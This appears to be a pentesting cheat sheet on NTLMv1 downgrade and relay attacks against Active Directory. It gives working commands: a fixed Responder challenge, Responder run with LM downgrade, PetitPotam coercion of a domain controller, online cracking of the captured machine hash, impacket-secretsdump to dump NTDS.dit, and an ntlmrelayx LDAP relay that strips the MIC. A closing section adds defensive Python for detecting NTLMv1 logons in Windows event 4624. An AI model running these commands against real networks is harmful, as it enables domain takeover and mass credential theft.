NTLMv1

NTLMv1 downgrade

Add the following line to Responder.conf so that every request uses the same fixed challenge:

; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788

Run Responder with LM downgrade enabled and Extended Session Security disabled:

sudo responder -I <network interface> --lm --disable-ess

Run a coercion tool (e.g. PetitPotam) to make the target DC authenticate to the listener:

# e.g. https://github.com/topotam/PetitPotam
python3 PetitPotam.py <listener IP> <target DC IP> -u <USERNAME> -p <PASSWORD>

Crack the NTLMv1 hash captured for the coerced computer account

# https://ntlmv1.com
Enter the captured hash (the first hash Responder prints after the domain), e.g. DC01$::<FQDN>:<NTHASH>

Dump NTDS.dit using the recovered machine account NTLM hash

impacket-secretsdump -hashes ':<MACHINE HASH>' '<FQDN>/<HOSTNAME>$'@<DC-IP>

NTLMv1 LDAP relay

Relay the coerced authentication to LDAP from the first DC to the second DC:

impacket-ntlmrelayx -t ldap://<DC1-IP> --remove-mic -smb2support --delegate-access

Force authentication

Create silver ticket

Dump NTDS NTLM hashes
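Both the downgrade and the LDAP relay above leave NTLMv1 (or LM) machine-account logons in the Security log of whichever server accepted them, which is the detection a defender wants. The following Python is an added, defender-side example, not part of this page's tooling: it parses Security event 4624 XML and flags NTLMv1/LM logons, marking computer accounts; the event records are constructed samples whose field names follow the standard Windows event schema.

```python
import xml.etree.ElementTree as ET

# "Package Name (NTLM only)" in Event Viewer is LmPackageName in the event XML.
# "NTLM V2" is expected; "NTLM V1" or "LM" means a downgraded response was
# accepted, which LmCompatibilityLevel 5 on the server would have refused.
WEAK_PACKAGES = {"NTLM V1", "LM"}

def parse_event_data(xml_text):
    """Return EventData as {Name: text}, ignoring the XML namespace."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "").strip()
            for d in root.iter() if d.tag.rsplit("}", 1)[-1] == "Data"}

def find_weak_ntlm_logons(xml_events):
    """One finding per 4624 logon that used NTLMv1 or LM. Machine accounts
    (names ending in '$') are marked: a DC or server authenticating with
    NTLMv1 is the trace a coerced, downgraded authentication leaves."""
    findings = []
    for xml_text in xml_events:
        data = parse_event_data(xml_text)
        if data.get("AuthenticationPackageName") != "NTLM":
            continue
        package = data.get("LmPackageName", "-")
        if package not in WEAK_PACKAGES:
            continue
        user = data.get("TargetUserName", "")
        findings.append({"user": user, "domain": data.get("TargetDomainName", ""),
                         "package": package, "source_ip": data.get("IpAddress", ""),
                         "machine_account": user.endswith("$")})
    return findings

def make_event(user, domain, package, ip):
    """Build a minimal constructed 4624 event (sample data, not real output)."""
    return ("<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>"
            "<System><EventID>4624</EventID></System><EventData>"
            f"<Data Name='TargetUserName'>{user}</Data>"
            f"<Data Name='TargetDomainName'>{domain}</Data>"
            "<Data Name='AuthenticationPackageName'>NTLM</Data>"
            f"<Data Name='LmPackageName'>{package}</Data>"
            f"<Data Name='IpAddress'>{ip}</Data></EventData></Event>")

# Constructed sample: one healthy NTLMv2 logon, one downgraded machine-account
# logon of the kind a coerced DC produces, one LM response.
SAMPLE_EVENTS = [
    make_event("alice", "CORP", "NTLM V2", "10.0.0.15"),
    make_event("DC02$", "CORP", "NTLM V1", "10.0.0.9"),
    make_event("svc-backup", "CORP", "LM", "10.0.0.23"),
]
```

Feed it the XML of real 4624 events (e.g. exported from the DC's Security log) and treat any finding with `machine_account` set as a priority alert.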
